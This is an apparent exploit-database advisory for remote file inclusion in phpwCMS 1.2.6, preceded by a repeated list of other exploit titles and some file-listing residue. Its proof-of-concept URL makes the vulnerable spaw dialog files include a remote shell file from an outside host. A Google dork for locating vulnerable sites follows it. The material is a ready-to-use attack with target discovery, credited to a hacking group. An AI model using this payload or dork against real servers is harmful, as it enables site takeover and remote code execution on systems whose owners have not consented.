
2 new exploits SAPID Blog beta 2 - (root_path) Remote File Inclusion SAPID Gallery 1.0 - (root_path) Remote File Inclusion SAPID Shop 1.2 - (root_path) Remote File Inclusion SAPID Blog beta 2 - (root_path) Remote File Inclusion SAPID Gallery 1.0 - (root_path) Remote File Inclusion SAPID Shop 1.2 - (root_path) Remote File Inclusion PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion phNNTP 1.3 - (article-raw.php) Remote File Inclusion Cwfm 0.9.1 - (Language) Remote File Inclusion PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC Cwfm 0.9.1 - (Language) Remote File Inclusion PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion PHPMyRing 4.2.0 - (view_com.php) SQL Injection SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit phpwcms 1.1-RC4 - (spaw) Remote File Inclusion Spaminator 1.7 - (page) Remote File Inclusion Thatware 0.4.6 - (root_path) Remote File Inclusion Spaminator 1.7 - (page) Remote File Inclusion Thatware 0.4.6 - (root_path) Remote File Inclusion phpPrintAnalyzer 1.2 - Remote File Inclusion Wheatblog 1.1 - (session.php) Remote File Inclusion phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload FortiClient SSLVPN 5.4 - Credentials Disclosure
38 lines
790 B
Text
Executable file
38 lines
790 B
Text
Executable file
PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities
|
|
|
|
Discovered by :
|
|
|
|
|\/| _ ._ _ _.._
|
|
| |(_)| (_|(_|| |
|
|
_|
|
|
|
|
|
|
|
|
Vuln In :
|
|
include $spaw_root.'class/lang.class.php';
|
|
|
|
Affected Files :
|
|
include/inc_ext/spaw/dialogs/table.php
|
|
include/inc_ext/spaw/dialogs/a.php
|
|
include/inc_ext/spaw/dialogs/colorpicker.php
|
|
include/inc_ext/spaw/dialogs/confirm.php
|
|
include/inc_ext/spaw/dialogs/img.php
|
|
include/inc_ext/spaw/dialogs/img_library.php
|
|
include/inc_ext/spaw/dialogs/td.php
|
|
|
|
Vendor Website: http://www.phpwcms.de/
|
|
|
|
PoC:
|
|
http://server/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?
|
|
|
|
Google Dork:
|
|
|
|
inurl:"phpwcms/index.php?id="
|
|
|
|
Visit us :
|
|
|
|
www.ehmorgan.net
|
|
irc.gigachat.net
|
|
#Morgan
|
|
|
|
# milw0rm.com [2006-08-10]
|